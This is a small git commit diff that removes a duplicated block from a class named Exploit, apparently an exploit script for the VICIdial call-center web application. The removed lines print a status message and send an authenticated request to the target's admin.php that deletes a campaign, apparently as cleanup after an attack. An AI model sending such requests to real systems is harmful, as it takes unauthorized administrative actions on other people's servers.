Remove duplicate instruction

This commit is contained in:
Chocapikk
2024-09-16 00:39:01 +02:00
parent 2796df771c
commit b9f2928d49

View File

@@ -637,15 +637,6 @@ class Exploit:
data=record2_body,
)
self.custom_print(
f"Deleting campaign '{self.COMPANY_NAME}_campaign' with ID {self.CAMPAIGN_ID}",
"*",
)
session.get(
f"{self.TARGET_URL}/vicidial/admin.php?ADD=61&campaign_id={self.CAMPAIGN_ID}&CoNfIrM=YES",
headers=request_headers,
)
return True
except Exception as e: